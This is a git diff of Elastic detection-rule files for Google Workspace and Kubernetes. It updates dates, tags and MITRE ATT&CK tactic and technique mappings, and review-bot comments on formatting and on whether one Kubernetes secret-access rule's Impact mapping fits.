@@ -103,14 +97,36 @@ event.dataset:google_workspace.admin and event.provider:admin [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1531" -name = "Account Access Removal" -reference = "https://attack.mitre.org/techniques/T1531/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml b/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml index 9da5f09028e..39173e2ad0e 100644 --- a/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml +++ b/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/16" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
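Review bot: The second `[[rule.threat]]` block added for Defense Evasion is laid out differently from the first one in the same hunk: `+framework = "MITRE ATT&CK"` is followed directly by `+[[rule.threat.technique]]`, whereas the Credential Access block above it separates every table with a blank line. The added blocks in initial_access_object_copied_to_external_drive_with_app_consent.toml show the same drift (no blank line between `reference` and `[rule.threat.tactic]`, nor before the second `[[rule.threat]]`). If the repo normalises rule files with a formatter, running it here would settle the spacing; otherwise mirror the first block's layout so the two tactic entries read identically.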
@@ -86,13 +86,7 @@ references = [ risk_score = 47 rule_id = "38f384e0-aef8-11ed-9a38-f661ea17fbcc" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -104,19 +98,13 @@ iam where event.dataset == "google_workspace.admin" and event.action == "ADD_GRO [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml b/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml index e3a60da3cd3..4c6bd7ab17f 100644 --- a/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml +++ b/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -77,13 +77,7 @@ references = [ risk_score = 21 rule_id = "00678712-b2df-11ed-afe9-f661ea17fbcc" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -94,19 +88,23 @@ event.dataset:google_workspace.admin and event.category:iam and event.action:UNS [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml b/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml index 46a1d328e83..7f270de664b 100644 --- a/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml +++ b/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/07" integration = ["google_workspace"] maturity = "production" -updated_date = "2025/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -89,12 +89,7 @@ references = [ risk_score = 47 rule_id = "f33e68a4-bd19-11ed-b02f-f661ea17fbcc" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Execution", "Tactic: Persistence", "Data Source: Google Workspace", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -116,19 +111,31 @@ sequence by source.user.email with maxspan=3m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" +id = "T1204.001" +name = "Malicious Link" +reference = "https://attack.mitre.org/techniques/T1204/001/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml b/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml index 90cf5ef9b6e..3433348477a 100644 --- a/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml +++ b/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -104,8 +104,12 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml b/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml index 4647fb4aed4..9dc67a9a58a 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/26" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -86,13 +86,7 @@ references = [ risk_score = 47 rule_id = "5e161522-2545-11ed-ac47-f661ea17fbce" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Google Workspace", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -103,14 +97,36 @@ event.dataset:"google_workspace.login" and event.action:"2sv_disable" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml b/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml index a23661911b2..1439fc968b1 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -89,13 +89,7 @@ references = [ risk_score = 73 rule_id = "68994a6c-c7ba-4e82-b476-26a26877adf6" severity = "high" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -107,19 +101,36 @@ event.dataset:"google_workspace.admin" and event.category:"iam" and event.action [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml b/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml index 643c9d27e06..5342d9390fe 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,13 +87,7 @@ references = [ risk_score = 47 rule_id = "ad3f2807-2b3e-47d7-b282-f84acbbe14be" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Persistence", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -104,14 +98,36 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml b/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml index 986aac4bd3d..c7acf7764c1 100644 
--- a/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,13 +85,7 @@ references = [ risk_score = 47 rule_id = "a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -111,14 +105,13 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml b/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml index 040e19fdd98..b71a1ab8f60 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,13 +89,7 @@ references = [ risk_score = 47 rule_id = "6f435062-b7fc-4af9-acea-5b1ead65c5a5" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Persistence", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -106,14 +100,36 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml b/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml index cb0bc8fec70..257ab1403ac 100644 
--- a/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/06" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -88,13 +88,7 @@ references = [ risk_score = 21 rule_id = "cc6a8a20-2df2-11ed-8378-f661ea17fbce" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Google Workspace", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -106,19 +100,36 @@ event.dataset:"google_workspace.admin" and event.type:change and event.category: [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml b/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml index 8bc3d051239..13b9f2a5eef 100644 --- a/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml +++ b/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,13 +83,7 @@ references = [ risk_score = 47 rule_id = "e555105c-ba6d-481f-82bb-9b633e7b4827" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -100,14 +94,36 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml b/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml index 0a6f1a1293f..e4be94a152b 100644 --- a/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml +++ b/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/10" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -70,15 +70,7 @@ references = [ risk_score = 47 rule_id = "220d92c6-479d-4a49-9cc0-3a29756dad0c" severity = "medium" -tags = [ - "Data Source: Kubernetes", - "Domain: Kubernetes", - "Domain: Cloud", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Collection", - "Resources: Investigation Guide", -] +tags = ["Tactic: Credential Access", "Tactic: Impact", "Data Source: Kubernetes", "Domain: Kubernetes", "Domain: Cloud", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -111,31 +103,36 @@ FROM logs-kubernetes.audit_logs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.007" name = "Container API" reference = "https://attack.mitre.org/techniques/T1552/007/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/kubernetes/defense_evasion_events_deleted.toml b/rules/integrations/kubernetes/defense_evasion_events_deleted.toml index 106c1158e52..cf03e321426 100644 --- a/rules/integrations/kubernetes/defense_evasion_events_deleted.toml 
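Review bot: T1565.001 Stored Data Manipulation under Impact asserts that the detected request modifies the secret or configmap, but the rule name (`..._secret_configmap_access`) and the retained T1552.007 Unsecured Credentials: Container API entry describe reading it; the ESQL query is outside this hunk, so please confirm it matches mutating verbs (`update`, `patch`, `delete`) before keeping the Impact entry and the `Tactic: Impact` tag. If it only matches `get`/`list`/`watch`, the honest mapping is the Credential Access entry alone — dropping T1530 / Collection is fine either way, since a Kubernetes secret is not cloud storage. The blank-line reshuffle around `[[rule.threat.technique]]` is cosmetic.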
+++ b/rules/integrations/kubernetes/defense_evasion_events_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/27" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/01/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -74,11 +74,6 @@ id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" -[[rule.threat.technique.subtechnique]] -id = "T1070.004" -name = "File Deletion" -reference = "https://attack.mitre.org/techniques/T1070/004/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml index 7e2e716541f..6226a49b4c1 100644 --- a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml +++ b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/13" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -69,13 +69,7 @@ references = [ risk_score = 21 rule_id = "63c056a0-339a-11ed-a261-0242ac120002" severity = "low" -tags = [ - "Data Source: Kubernetes", - "Domain: Kubernetes", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Resources: Investigation Guide", -] +tags = ["Tactic: Defense Evasion", "Tactic: Discovery", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -88,6 +82,24 @@ user_agent.original:(* and not (*kubernetes/$Format or karpenter or csi-secrets- [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" @@ -97,7 +109,6 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml b/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml index 359940c58b7..5b03ba10457 100644 --- a/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml +++ b/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml @@ -2,7 +2,7 @@ creation_date = "2022/06/30" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -91,6 +91,11 @@ kubernetes.audit.objectRef.resource:("selfsubjectaccessreviews" or "selfsubjectr [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" 
@@ -100,7 +105,6 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml b/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml index 25df5e78816..f670851fa90 100644 --- a/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml +++ b/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -40,6 +40,11 @@ kubernetes.audit.objectRef.resource == "pods" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml index 19a1619b8ab..c3976832488 100644 --- a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml +++ b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/24" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/01/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
